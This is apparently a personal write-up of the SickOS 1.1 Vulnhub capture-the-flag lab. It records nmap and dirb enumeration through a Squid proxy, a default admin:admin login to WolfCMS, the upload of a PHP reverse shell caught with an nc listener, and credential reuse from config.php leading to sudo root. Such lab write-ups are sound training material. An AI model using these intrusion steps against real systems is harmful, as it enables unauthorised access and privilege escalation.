SickOS 1.1

Available from Vulnhub

This is a boot-to-root image from D4rk, released 12/11/15. The description states it is similar in difficulty to machines found in the OSCP lab, so I was pretty excited to try it.

Issues

I couldn’t get the .ovf file to import using VirtualBox, so after some digging I did this:

bash-3.2$ VBoxManage clonemedium --format VDI SickOs1.1-disk1.vmdk SickOs1.1-disk1.vdi
0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%
Clone medium created in format 'VDI'. UUID: e3e52fbe-8c16-442d-b8e6-c60f783d3bf7

Created a new VM with 1 cpu, 512M ram, enabled pae after VirtualBox complained.

Initial scan and enumeration

[root:~]# nmap -sT -sV -v 10.0.2.10

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-12-14 23:30 EST
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 23:30
Scanning 10.0.2.10 [1 port]
Completed ARP Ping Scan at 23:30, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:30
Completed Parallel DNS resolution of 1 host. at 23:30, 0.00s elapsed
Initiating Connect Scan at 23:30
Scanning 10.0.2.10 [1000 ports]
Discovered open port 22/tcp on 10.0.2.10
Discovered open port 3128/tcp on 10.0.2.10
Completed Connect Scan at 23:30, 4.46s elapsed (1000 total ports)
Initiating Service scan at 23:30
Scanning 2 services on 10.0.2.10
Completed Service scan at 23:30, 11.03s elapsed (2 services on 1 host)
NSE: Script scanning 10.0.2.10.
Initiating NSE at 23:30
Completed NSE at 23:30, 0.22s elapsed
Nmap scan report for 10.0.2.10
Host is up, received arp-response (0.00062s latency).
Not shown: 997 filtered ports, 1 closed port
Reason: 997 no-responses and 1 conn-refused
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open  http-proxy syn-ack Squid http proxy 3.1.19
MAC Address: 08:00:27:5C:C6:C9 (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.23 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Trying to connect over ssh didn’t give any helpful banner, so I moved on to the squid proxy. Maybe there’s a web server hiding behind squid…

[root:~]# dirb http://10.0.2.10 /usr/share/wordlists/dirb/common.txt -p 10.0.2.10:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Dec 11 22:41:59 2015
URL_BASE: http://10.0.2.10/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
PROXY: 10.0.2.10:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.2.10/ ----
+ http://10.0.2.10/cgi-bin/ (CODE:403|SIZE:285)                                                                                                                                                                                             
+ http://10.0.2.10/connect (CODE:200|SIZE:109)                                                                                                                                                                                              
+ http://10.0.2.10/index (CODE:200|SIZE:21)                                                                                                                                                                                                 
+ http://10.0.2.10/index.php (CODE:200|SIZE:21)                                                                                                                                                                                             
+ http://10.0.2.10/robots (CODE:200|SIZE:45)                                                                                                                                                                                                
+ http://10.0.2.10/robots.txt (CODE:200|SIZE:45)                                                                                                                                                                                            
+ http://10.0.2.10/server-status (CODE:403|SIZE:290)                                                                                                                                                                                        
                                                                                                                                                                                                                                            
-----------------
END_TIME: Fri Dec 11 22:42:03 2015
DOWNLOADED: 4612 - FOUND: 7

I checked out robots.txt, hopeing for a hint:

[root:~]# curl 10.0.2.10/robots.txt -x 10.0.2.10:3128
User-agent: *
Disallow: /
Dissalow: /wolfcms

Exploitation

Looks like a wolfcms installation. Here is a published vulnerability for version 0.8.2. Even though I couldn’t find the installation’s version after viewing the page source, I figured it was worth a try. I needed to log in to the administration panel though, so I set FoxyProxy to use 10.0.2.10:3128 as the proxy and browsed to http://10.0.2.10/wolfcms/?/admin/login:

Login

I tried admin:admin and logged in!

The exploit suggests that any file can be uploaded using the File Manager Function, so after browsing to http://10.0.2.10/wolfcms/?/admin/plugin/file_manager I uploaded pentestmonkey’s php reverse shell:

upload

Next, I set up a listener and visited the php-reverse-shell.

[root:~]# curl -x 10.0.2.10:3128 http://10.0.2.10/wolfcms/public/php-reverse-shell.php
[root:~]# nc -lnvp 443                                                                
listening on [any] 443 ...
connect to [10.0.2.7] from (UNKNOWN) [10.0.2.10] 53514
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 21:23:59 up 17:40,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@SickOs:/$ 

Escalation

I checked for interesting files in the web directory:

www-data@SickOs:/var/www/wolfcms$ ls -lah
ls -lah
total 52K
drwxr-xr-x 5 root root 4.0K Dec  5 06:33 .
drwxrwxrwx 3 root root 4.0K Dec 13 00:12 ..
-rwxr-xr-x 1 root root  950 Dec  5 06:15 .htaccess
-rwxrwxrwx 1 root root 4.0K Dec  5 06:15 CONTRIBUTING.md
-rwxrwxrwx 1 root root 2.4K Dec  5 06:15 README.md
-rwxrwxrwx 1 root root  403 Dec  5 06:15 composer.json
-rwxrwxrwx 1 root root 3.0K Dec  5 07:26 config.php
drwxrwxrwx 2 root root 4.0K Dec  5 06:15 docs
-rwxrwxrwx 1 root root  894 Dec  5 06:15 favicon.ico
-rwxrwxrwx 1 root root 6.7K Dec  5 06:32 index.php
drwxrwxrwx 4 root root 4.0K Dec 12 21:59 public
-rwxrwxrwx 1 root root    0 Dec  5 06:15 robots.txt
drwxrwxrwx 7 root root 4.0K Dec  5 06:25 wolf

Maybe config.php has some interesting information.

www-data@SickOs:/var/www/wolfcms$ head -n 15 config.php
head -n 15 config.php
<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);

Root password?

www-data@SickOs:/var/www/wolfcms$ su -
su -
Password: john@123

su: Authentication failure

I guess not. /etc/passwd has an entry for user ‘sickos’:

sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
Password: john@123

sickos@SickOs:/var/www/wolfcms$ sudo -l
sudo -l
[sudo] password for sickos: john@123

Matching Defaults entries for sickos on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL
sickos@SickOs:/var/www/wolfcms$ sudo su -
sudo su -
root@SickOs:~# ls -lah
ls -lah
total 40K
drwx------  3 root root 4.0K Dec 12 22:47 .
drwxr-xr-x 22 root root 4.0K Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3.8K Dec 13 00:12 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  2 root root 4.0K Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 4.7K Dec 12 22:47 .viminfo
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

Thanks for the fun challange!